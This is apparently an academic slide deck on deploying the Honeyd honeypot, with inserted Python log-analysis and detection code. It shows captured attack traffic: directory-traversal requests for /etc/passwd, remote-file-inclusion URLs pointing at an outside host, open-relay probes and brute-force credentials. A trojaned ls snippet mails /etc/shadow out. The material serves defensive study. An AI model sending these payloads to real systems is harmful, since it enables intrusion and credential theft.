Using Honeypots with Honeyd

Pedro Pereira, Ulisses Costa

Cryptography and Information Systems Security
ShellCode
   - A set of instructions (in machine code or not) ...

RootKits
   - Set of malicious programs (trojans, backdoors ...
   - chkrootkit and rkhunter (Linux);
   ...

Trojaned ls

    #!/bin/bash

    mv /bin/ls /bin/ls.old

    /bin/echo "cat /etc/shadow | mail intruso...

Conclusion
1. Using Honeypots with Honeyd
   Pedro Pereira, Ulisses Costa
   Cryptography and Information Systems Security
   18 December 2008
2. Outline
   1 Introduction
       Honeypots
       Honeyd
   2 Log
       Honeyd main log
   3 SMTP
       Open mail relay
   4 HTTP
       webcollage/1.135a
       Directory traversal
       Morfeus Scanner
         WebCalendar
         Mambo/Joomla
         Preventing Morfeus Scanner attacks
       Attack on POP3
       SSH
   5 The threat
4. What are honeypots?
   - Programs that emulate known vulnerabilities
   - Traps to detect or prevent attacks
5. Types of honeypots
   Personality
     - High-interaction
     - Low-interaction
   Modus operandi
     - Server
     - Client
7. Honeyd
   - Creation of virtual hosts
   - Configuration of the hosts
   - Support for more than 1000 personalities
   - Many dozens of scripts for service emulation
8. Honeyd configuration

    bash> farpd 192.168.1.50 -i eth0

    # File: /etc/defaults/honeyd
    # Defaults for honeyd initscript
    # Run as a daemon
    RUN="yes"
    # Network interface on which honeyd will listen for requests
    INTERFACE="eth0"
    # Network that honeyd simulates
    NETWORK=192.168.1.50
    # Set of options
    # -c hostname:port:username:password
    OPTIONS="-c localhost:12345:username:password"
9. The -c hostname:port:username:password option
   Generation of partial Honeyd statistics

    bash> honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port \
        --spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country \
        -f /etc/honeypot/honeydstats.conf -l localhost -p 12345

    # File: /etc/honeypot/honeydstats.conf
    # honeydstats configuration file
    username:password
10. Honeypot configuration (1/2)

    # File: /etc/honeypot/honeyd.conf
    # Honeypot configuration
    create win2k
    set win2k personality "Microsoft Windows 2000 SP2"
    set win2k default tcp action reset
    set win2k default udp action reset
    set win2k default icmp action block
    set win2k uptime 3567
    add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7.0/telnetd.sh"
    add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
    add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
    add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=scripts/unix/general"
11. Honeypot configuration (2/2)

    add win2k udp port 137 proxy $ipsrc:137
    add win2k udp port 138 proxy $ipsrc:138
    add win2k udp port 445 proxy $ipsrc:445
    add win2k tcp port 137 proxy $ipsrc:137
    add win2k tcp port 138 proxy $ipsrc:138
    add win2k tcp port 139 proxy $ipsrc:139
    add win2k tcp port 445 proxy $ipsrc:445
    bind 192.168.1.50 win2k

   - Impossible to monitor the NETBIOS ports
   - Great complexity
   - Decision: forward them back to the source
   Start our honeypot:

    bash> /etc/init.d/honeyd start
13. Files

    /var/log/honeyd.txt           SMTP, Telnet, IMAP, POP3
    /var/log/honeypot/web.log     HTTP
    /var/log/honeypot/honeyd.log  Honeyd main log
15. Format of the file /var/log/honeypot/honeyd.log

    Date  Protocol  T  SrcIP            SrcPort  DstIP  DstPort  Info       Comment
    ...   tcp(6)    S  88.44.123.210    3637     ...    139                 [Windows XP SP1]
    ...   tcp(6)    S  82.155.0.49      22617    ...    139
    ...   tcp(6)    E  82.155.1.160     4399     ...    445:     00
    ...   tcp(6)    -  82.155.122.18    61582    ...    139:     40 R
    ...   icmp(1)   -  80.236.5.27               ...:            3(13): 56
    ...   tcp(6)    -  82.154.64.174    34507    ...    445:     40 RA
    ...   tcp(6)    -  124.8.74.33      1806     ...    25:      70 FPA     [Windows XP SP1]
    ...   tcp(6)    -  168.167.152.228  58274    ...    445:     52 FA      [Windows XP SP1]
    ...   tcp(6)    -  168.167.152.228  58274    ...    445:     52 FA
    ...   tcp(6)    -  82.155.57.245    58274    ...    445:     52 PA      [Windows XP SP1]
    ...   tcp(6)    -  193.136.19.149   58274    ...    445:     52 PA
    ...   tcp(6)    -  88.175.73.149    4332     ...    139:     40 R       [Windows XP SP1]
    ...   tcp(6)    -  82.155.137.139   1230     ...    445:     40 A       [Windows XP SP1]
    ...   tcp(6)    -  82.155.7.176     2794     ...    445:     40 A
    ...   tcp(6)    -  82.155.116.238   3578     ...    23:      60 S       [Linux 2.6.1-7]
    ...   tcp(6)    -  124.207.41.198   48804    ...    23:      40 S
    ...   udp(17)   -  192.168.1.254    67       ...    68:      298

   - Date in the format: 2008-12-15-22:59:03.4039
   - DstIP is always the same (in this case): 192.168.1.50
16. Format of the file /var/log/honeypot/honeyd.log

    2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
    2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008

   - For TCP and UDP, not every packet transmission is recorded
   - It would be far too verbose
   - Only the amount of data transmitted is kept
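As an added example (not code from the slides or from Honeyd itself), a parser for the honeyd.log records shown on slides 15 and 16: it pairs each S record with its E record to get a session's duration and byte counts, and tallies which destination ports each source touched. The sample lines are the two from this slide plus rows modelled on slide 15, whose timestamps are constructed because the slide elides them.

```python
"""Parser and summariser for Honeyd's main log (/var/log/honeypot/honeyd.log).

Added example; not code from the original slides or from the Honeyd project.
Record layout as the slides show it:
    <timestamp> <proto>(<num>) <S|E|-> <src> [<sport>] <dst> [<dport>][: <info>] [<comment>]
  S = a TCP/UDP connection was opened (comment = passive OS fingerprint of the source)
  E = the connection ended, info = "<bytes received> <bytes sent>"
  - = a lone packet that opened no connection (TCP: "<len> <flags>", ICMP: "<type>(<code>): <len>")
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+"
    r"(?P<proto>[a-z]+)\((?P<pnum>\d+)\)\s+"
    r"(?P<kind>[SE-])\s+"
    r"(?P<src>\d+(?:\.\d+){3})(?:\s+(?P<sport>\d+))?\s+"
    r"(?P<dst>\d+(?:\.\d+){3})(?:\s+(?P<dport>\d+))?"
    r"(?::\s*(?P<info>[^\[]*?))?\s*"
    r"(?:\[(?P<comment>[^\]]*)\])?\s*$"
)

# Two records copied from slide 16 plus lines modelled on the slide-15 rows;
# slide 15 shows no timestamps, so the ones below are constructed.
SAMPLE_LOG = """\
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
2009-01-01-06:00:00.0000 tcp(6) S 88.44.123.210 3637 192.168.1.50 139 [Windows XP SP1]
2009-01-01-06:00:01.0000 tcp(6) - 82.155.122.18 61582 192.168.1.50 139: 40 R
2009-01-01-06:00:02.0000 icmp(1) - 80.236.5.27 192.168.1.50: 3(13): 56
2009-01-01-06:00:03.0000 udp(17) - 192.168.1.254 67 192.168.1.50 68: 298
2009-01-01-06:00:04.0000 tcp(6) S 82.155.122.18 61583 192.168.1.50 445 [Windows XP SP1]
2009-01-01-06:00:05.0000 tcp(6) S 82.155.122.18 61584 192.168.1.50 25
"""


def parse_line(line):
    """Turn one log line into a dict; None for lines that do not fit the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%Y-%m-%d-%H:%M:%S.%f")
    for key in ("pnum", "sport", "dport"):
        rec[key] = int(rec[key]) if rec[key] is not None else None
    rec["info"] = (rec["info"] or "").strip()
    rec["bytes_in"] = rec["bytes_out"] = None
    if rec["kind"] == "E":
        # End record: Honeyd logs only the totals, not every packet.
        received, sent = rec["info"].split()
        rec["bytes_in"], rec["bytes_out"] = int(received), int(sent)
    return rec


def parse_log(text):
    return [r for r in (parse_line(ln) for ln in text.splitlines()) if r]


def sessions(records):
    """Join each S record with its E record on the 4-tuple; report duration and volume."""
    open_conns, done = {}, []
    for r in records:
        key = (r["src"], r["sport"], r["dst"], r["dport"])
        if r["kind"] == "S":
            open_conns[key] = r
        elif r["kind"] == "E" and key in open_conns:
            start = open_conns.pop(key)
            done.append({
                "src": r["src"], "dport": r["dport"],
                "duration": (r["time"] - start["time"]).total_seconds(),
                "bytes_in": r["bytes_in"], "bytes_out": r["bytes_out"],
                "os": start["comment"],
            })
    return done


def per_source(records):
    """Per source IP: connections it opened and the destination ports it touched."""
    out = defaultdict(lambda: {"starts": 0, "ports": set()})
    for r in records:
        if r["dport"] is not None:
            out[r["src"]]["ports"].add(r["dport"])
        if r["kind"] == "S":
            out[r["src"]]["starts"] += 1
    return {src: {"starts": v["starts"], "ports": sorted(v["ports"])} for src, v in out.items()}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for s in sessions(recs):
        print(s)
    for src, v in sorted(per_source(recs).items()):
        print(src, v)
```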
18. SMTP
   - Used on the server side to send messages
   - To receive, POP3 or IMAP are used
19. SMTP - Honeypot
20. The EHLO command in SMTP
   - Command used to identify clients
21. The EHLO command in SMTP

    S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009
    C: EHLO windows
    S: 250-bps-pc9.local.mynet Hello [12]
    S: 250-TURN
    S: 250-ATRN
    S: 250-SIZE
    S: 250-ETRN
    S: 250-PIPELINING
    S: 250-DSN
    S: 250-ENHANCEDSTATUSCODES
    S: 250-8bitmime
    S: 250-BINARYMIME
    S: 250-CHUNKING
    S: 250-VRFY
    S: 250-X-EXPS GSSAPI NTLM LOGIN
    S: 250-X-EXPS=LOGIN
    S: 250-AUTH GSSAPI NTLM LOGIN
    S: 250-AUTH=LOGIN
    S: 250-X-LINK2STATE
    S: 250-XEXCH50
    S: 250 OK

   - Identification by non-real domain names
22. Spam on SMTP servers
23. Solutions
   - EHLO [host]
   - check whether they resolve
25. Attacks

    HELO 82.155.248.223
    MAIL FROM: <jk9l3g4jle@yahoo.com>
    RCPT TO: <sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname=82.155.248.223

    2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
    2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920
26. Attacks

    HELO 82.155.251.32
    MAIL FROM: <gt48m7g3k6f@yahoo.com>
    RCPT TO: <sseenndd1201@yahoo.com.hk>
    DATA
    Subject: Super webscan open relay check succeded, hostname=82.155.251.32

    2008-12-23-12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
    2008-12-23-12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
    2008-12-23-12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
    2008-12-23-14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP SP1]
    2008-12-23-14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
    2008-12-23-14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418
27. Attacks

    HELO 82.155.103.147
    MAIL FROM: <ttc585ttc585@yahoo.com.tw>
    RCPT TO: <vjd39hww@yahoo.com.tw>
    DATA
    Received: from ([145.200.201.114]) by 82.155.103.147 id <9624303-98482>; Tue, 06 Jan 2009 21:16:04 -0100
    Message-ID: <w58$6a4j1fqc6q@ocjc8ujvz>
    From: "" <ttc585ttc585@yahoo.com.tw>
    To: <vjd39hww@yahoo.com.tw>
    Subject: BC_82.155.103.147
    Date: Tue, 06 Jan 09 21:16:04 GMT
    MIME-Version: 1.0
    Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C2CC60.49F4EC70"
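As an added example (not code from the slides or from Honeyd's SMTP script), the checks slide 23 proposes applied to captured sessions like the ones on slides 25 to 27: is the HELO/EHLO argument a proper host name that resolves, is the message foreign at both ends (so the honeypot is being used as a relay), and does the subject carry a relay-test marker. The first session is the one from slide 25; the second is constructed, as are the local-domain set and the resolver hook.

```python
"""Open-relay probe detection over SMTP sessions captured by the honeypot.

Added example; not code from the original slides or from the Honeyd scripts.
Checks: HELO/EHLO argument sanity and resolvability (slide 23), relaying
(neither sender nor recipient belongs to the honeypot's own domains), and the
"open relay check" marker the webscan probes put in their Subject (slide 25).
"""
import re
import socket

# Assumed local domains; the EHLO banner on slide 21 names bps-pc9.local.mynet.
LOCAL_DOMAINS = {"local.mynet", "bps-pc9.local.mynet"}

# Session from slide 25 (addresses as shown there) plus a constructed legitimate one.
SAMPLE_SESSIONS = [
    """HELO 82.155.248.223
MAIL FROM: <jk9l3g4jle@yahoo.com>
RCPT TO: <sseenndd1201@yahoo.com.hk>
DATA
Subject: Super webscan open relay check succeded, hostname=82.155.248.223
""",
    """EHLO mail.example.net
MAIL FROM: <alice@example.net>
RCPT TO: <bob@local.mynet>
DATA
Subject: meeting notes
""",
]

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
ADDR_LITERAL_RE = re.compile(r"^\[(?:IPv6:)?[0-9A-Fa-f.:]+\]$")
FQDN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,}$")
RELAY_TEST_MARKERS = ("open relay check", "relay test")


def parse_session(text):
    """Pull HELO/EHLO name, envelope sender/recipients and Subject out of a session transcript."""
    sess = {"helo": None, "mail_from": None, "rcpt_to": [], "subject": None}
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^(?:HELO|EHLO)\s+(\S+)", line, re.I)
        if m:
            sess["helo"] = m.group(1)
            continue
        m = re.match(r"^MAIL FROM\s*:\s*<?([^>\s]*)>?", line, re.I)
        if m:
            sess["mail_from"] = m.group(1).lower()
            continue
        m = re.match(r"^RCPT TO\s*:\s*<?([^>\s]*)>?", line, re.I)
        if m:
            sess["rcpt_to"].append(m.group(1).lower())
            continue
        m = re.match(r"^Subject\s*:\s*(.*)$", line, re.I)
        if m:
            sess["subject"] = m.group(1)
    return sess


def domain_of(address):
    return address.rsplit("@", 1)[1] if address and "@" in address else ""


def is_local(domain):
    return any(domain == d or domain.endswith("." + d) for d in LOCAL_DOMAINS)


def default_resolver(name):
    """True when the name resolves; tests pass a fake so nothing touches the network."""
    try:
        socket.gethostbyname(name)
        return True
    except OSError:
        return False


def assess(session, resolver=default_resolver):
    """Findings for one parsed session; an empty list means nothing suspicious."""
    findings = []
    helo = session["helo"] or ""
    if not helo:
        findings.append("helo-missing")
    elif IPV4_RE.match(helo):
        findings.append("helo-bare-ip")      # RFC 5321 wants an FQDN or a [bracketed] literal
    elif not ADDR_LITERAL_RE.match(helo):
        if not FQDN_RE.match(helo):
            findings.append("helo-not-fqdn")
        elif not resolver(helo):
            findings.append("helo-unresolvable")
    sender_local = is_local(domain_of(session["mail_from"]))
    rcpts = session["rcpt_to"]
    if rcpts and not sender_local and not any(is_local(domain_of(r)) for r in rcpts):
        findings.append("relay-attempt")    # foreign sender to foreign recipient
    subject = (session["subject"] or "").lower()
    if any(mark in subject for mark in RELAY_TEST_MARKERS):
        findings.append("relay-test-marker")
    return findings


def scan(session_texts, resolver=default_resolver):
    return [assess(parse_session(s), resolver) for s in session_texts]
```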
29. HTTP hits
31. User agent: webcollage/1.135a

    --MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
    User-Agent: webcollage/1.135a
    Referer: http://random.yahoo.com/fast/ryl
    Host: www.morgangirl.com
    ",--ENDMARK--

   - Attempt to fetch an image through the honeypot
   - The honeypot may have been "seen" by a proxy scanner
   - The honeypot as an open proxy
33. Directory traversal
   - Also known as the dot dot slash attack (../)
   - Exploits insufficient validation of requests
   - System files

    GET ../../../../../../../../../../etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--
34. Directory traversal

    GET .../../../../../../../../../../etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--
35. Directory traversal

    GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--
36. Directory traversal

    GET ..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--
37. Directory traversal

    GET //etc/passwd HTTP/1.1

    --MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,"GET %2F%2Fetc%2Fpasswd HTTP/1.1
    User-Agent: Nmap NSE
    Connection: close
    Host: 82.155.127.187
    ",--ENDMARK--
38. Conclusion
   - Against the honeypot it was not successful
   - Low-interaction system
   - On our honeypot: error 302 Object moved
   - Use of the Nmap scripting engine
40. Morfeus Scanner
   - Looks for PHP vulnerabilities
   - Known vulnerabilities
41. Morfeus Scanner - WebCalendar
   - Creation of online calendars
   - Vulnerability in the file send_reminders.php

    --MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close
    ",--ENDMARK--
42. Morfeus Scanner - Mambo/Joomla
   - Very well-known CMSs
   - The attacker wants to set the variable mosConfig_absolute_path of the file index.php

    --MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Morfeus Scanner
    Host: 82.155.248.190
    Connection: Close
    ",--ENDMARK--
43. Preventing Morfeus Scanner attacks
   One way to block this type of attack coming from MFS is to add the following lines to the ".htaccess" file in the website's folder.

    # Start of .htaccess change.
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} ^Morfeus
    RewriteRule ^.*$ - [F]
    # End of .htaccess change.
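Detection logic over web.log records like those on slides 31 to 42, as an added example that is not part of the original slides or of the Honeyd scripts: it decodes each request and tags open-proxy probes (slide 31), the traversal variants Nmap sent, including the ..\/ and ..\ and //etc/passwd forms (slides 33 to 37), and the remote-file-inclusion parameters in the Morfeus Scanner requests (slides 41 and 42), which a user-agent rule alone would miss once the scanner changes its name. The sample records are reconstructed from the slides with shortened headers and traversal depth, plus one constructed benign request.

```python
"""Detection over Honeyd's IIS-script web log (/var/log/honeypot/web.log).

Added example; not code from the original slides or from the Honeyd scripts.
Record shape as the slides show it (the request part may span several lines):
  --MARK--,"<date>","<service>","<src ip>","<dst ip>",<sport>,<dport>,"<raw HTTP request>",--ENDMARK--
Tags: proxy-probe, directory-traversal, remote-file-inclusion, scanner-ua.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

RECORD_RE = re.compile(
    r'--MARK--,"(?P<date>[^"]*)","(?P<service>[^"]*)","(?P<src>[^"]*)","(?P<dst>[^"]*)",'
    r'(?P<sport>\d+),(?P<dport>\d+),"(?P<payload>.*?)",--ENDMARK--',
    re.DOTALL,
)
SCANNER_AGENTS = ("Morfeus Scanner", "Nmap NSE")   # both seen on the slides
DOTDOT_RE = re.compile(r"(^|/)\.\.+(/|$)")          # any '..' (or '...') path segment

# Records reconstructed from the slides (shortened) plus one constructed benign request.
SAMPLE_WEBLOG = r'''--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
Host: www.morgangirl.com
",--ENDMARK--
--MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,"GET %2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Host: 82.155.127.187
",--ENDMARK--
--MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,"GET %2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Host: 82.155.127.187
",--ENDMARK--
--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
User-Agent: Morfeus Scanner
Host: 82.155.248.190
",--ENDMARK--
--MARK--,"Sun Jan 4 06:00:00 WET 2009","IIS/HTTP","198.51.100.7","192.168.1.50",40000,80,"GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0
Host: 192.168.1.50
",--ENDMARK--
'''


def parse_weblog(text):
    """One dict per --MARK-- ... --ENDMARK-- record."""
    records = []
    for m in RECORD_RE.finditer(text):
        rec = m.groupdict()
        rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
        records.append(rec)
    return records


def split_request(payload):
    """(method, target, version, headers) from the raw request; None if the request line is malformed."""
    lines = payload.strip().splitlines()
    parts = lines[0].split() if lines else []
    if len(parts) != 3:
        return None
    hdrs = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            hdrs[k.strip().lower()] = v.strip()
    return parts[0], parts[1], parts[2], hdrs


def normalise_target(target):
    """Percent-decode twice (catches double encoding) and fold '\\' into '/' so ..\\ reads as ../ ."""
    return unquote(unquote(target)).replace("\\", "/")


def classify(rec):
    """Set of tags for one record; an empty set means the request looked ordinary."""
    tags = set()
    req = split_request(rec["payload"])
    if req is None:
        return tags
    _method, target, _version, hdrs = req
    if hdrs.get("user-agent", "").startswith(SCANNER_AGENTS):
        tags.add("scanner-ua")
    if target.lower().startswith(("http://", "https://")):
        tags.add("proxy-probe")          # client asks the honeypot to fetch a foreign URL
        return tags
    path = normalise_target(target)
    if DOTDOT_RE.search(path) or path.startswith("//"):
        tags.add("directory-traversal")
    query = path.partition("?")[2]       # everything after the first '?'
    for _key, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            tags.add("remote-file-inclusion")   # includedir=, mosConfig_absolute_path=, ...
            break
    return tags


def report(text):
    """Source IP -> sorted list of every tag raised by any of its requests."""
    seen = defaultdict(set)
    for rec in parse_weblog(text):
        seen[rec["src"]].update(classify(rec))
    return {src: sorted(t) for src, t in seen.items() if t}
```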
45. Brute-force attempt on the POP3 server
46. Brute-force attempt on the POP3 server

    ...
    --MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,"USER root PASS root",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,"USER root PASS root1",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,"USER staff PASS staff",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER root PASS 12345",--ENDMARK--
    --MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,"USER www PASS www",--ENDMARK--
    ...
48. SSH
   Here is a chart showing the attempted usernames:
49. SSH
   And the following chart shows the attempted passwords:
51. The threat
52. Port scanning
   - Discover machines and their open ports
   - Creation of custom packets
   - Hard to master
   - NMap - insecure.org
53. Port scanning
   - Open or Accepted: the machine sent a reply indicating that a service is listening on that port;
   - Closed, Denied or Not Listening: the machine sent a reply indicating that any connection to the port will be refused;
   - Filtered, Dropped or Blocked: there was no reply from the machine.
54. Port scanning
   Types of techniques
     - TCP/SYN
     - TCP Connect
     - UDP
55. TCP Connect
56. Port scanning
   Optimisation

    golden@golden-laptop:~$ sudo nmap -sS -sV 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
    golden@golden-laptop:~$ sudo nmap -sS -sV -P0 192.168.100.0/24
    ...
    Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds
57. Attack
   - Brute force / dictionaries
   - Exploitation of vulnerabilities
58. SSH
   - Port 22
   - Attacked by brute force / dictionaries
   - cat /var/log/auth.log
59. SSH - log
Dec 24 01:24:46 golden-laptop sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 golden-laptop sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 golden-laptop sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 golden-laptop sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:01 golden-laptop sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 golden-laptop sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 golden-laptop sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 golden-laptop sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
Dec 24 01:26:21 golden-laptop sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 golden-laptop sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 golden-laptop sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 golden-laptop sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!
